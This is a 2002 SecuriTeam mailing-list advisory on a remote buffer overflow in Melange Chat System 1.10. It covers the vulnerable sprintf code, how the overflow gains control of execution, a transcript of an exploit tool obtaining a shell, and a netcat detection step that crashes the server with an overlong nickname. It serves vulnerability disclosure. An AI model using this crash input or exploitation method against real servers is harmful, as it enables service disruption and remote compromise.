[UNIX] Melange Chat System Remote Buffer Overflow

From: support@securiteam.com
Date: 12/20/02

  • Next message: support@securiteam.com: "[EXPL] Pc-cillin pop3trap.exe Buffer Overflow Exploit" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 20 Dec 2002 01:18:46 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Melange Chat System Remote Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://melange.terminal.at/> Christian Walter's Melange Chat System is a
    chat client/server that provides an easy way to set up your own, power
    full chat. A remotely exploitable buffer overflow in the product allows a
    remote attacker to completely compromise the server.

    DETAILS

    Vulnerable systems:
     * Melange Chat System version 1.10

    Remote exploitation of a buffer overflow in Melange allows an attacker to
    crash the application and, in some cases, execute arbitrary code. The
    vulnerable area of code is found within interpret.c, chat_InterpretData(),
    line 55:

    sprintf(msgText,"<%d-%d, %s>:
    %s",mClient[sender].channel,sender,mClient[sender].name,data);

    The overflow occurs in the msgText buffer. This provides an attacker with
    control over the frame pointer and the last byte of the instruction
    pointer. If the instruction pointer can be modified to a "move %ebp, %esp"
    or a jump to such a move and place the address of arbitrary instructions
    in to %ebp, access to the system under the privileges of the user running
    the chat server is possible.

    The following transcript demonstrates successful exploitation against
    Melange compiled with GCC 2.95.3 against GLIBC v1.2.9:

    $ ./chester -t 2 -h -p 6666
    [i] Building string
     0x8077d9c as ebptag
     0xbfffdb97 as poptag
     0x78 as iptag
     0 as allign
    [i] Creating Connection.
    [0] Sending Normal Nick Change
    [1] Sending Pop Write
    [2] Sending Long Nick Change
    [3] Sending Crash String
    [i] Trying to trigger shell...
    Linux vmlinux 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
    uid=501(farmer) gid=501(farmer) groups=501(farmer)

    Analysis:
    Remote exploitation of the vulnerability allows an attacker to crash the
    server. Exploitation can also provide a remote attacker with local access
    to the target system. This can then be employed to launch privilege
    escalation attacks.

    Detection:
    Use the following steps to determine susceptibility:

    $ nc localhost 6666
    +++Online
    >> Melange Chat Server (Version 1.10), Apr-25-1999

    Welcome ! (Type /HELP for a list of commands)
    /nick AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >> Your new name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (Line 0).
    AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA
    [0, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]:
    AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA>> The administrator
    shut down the server !
    +++Quit

    If the server shuts down as shown above, then it is vulnerable.

    Vendore repsonse:
    Walter pointed to a message on the main web site that states, "Due to lack
    of time development on the Melange chat system and support had to be
    abandoned. You may go on now, but keep in mind that there was no update
    for a long time. THERE ARE KNOWN BUGS AND SECURITY CONCERNS, SO USING
    MELANGE IS ON YOUR OWN RISK!"

    Disclosure timeline:
    10/24/2002 Issue disclosed to iDEFENSE
    11/22/2002 Author notified (chris@terminal.at)
    11/25/2002 iDEFENSE clients notified
    12/01/2002 Second contact attempt with author
    12/09/2002 Third contact attempt with author
    12/16/2002 Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:listserv@idefense.com>
    iDEFENSE Labs, the vulnerability was discovered by
    <mailto:blink@poundtemp.org> blink.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages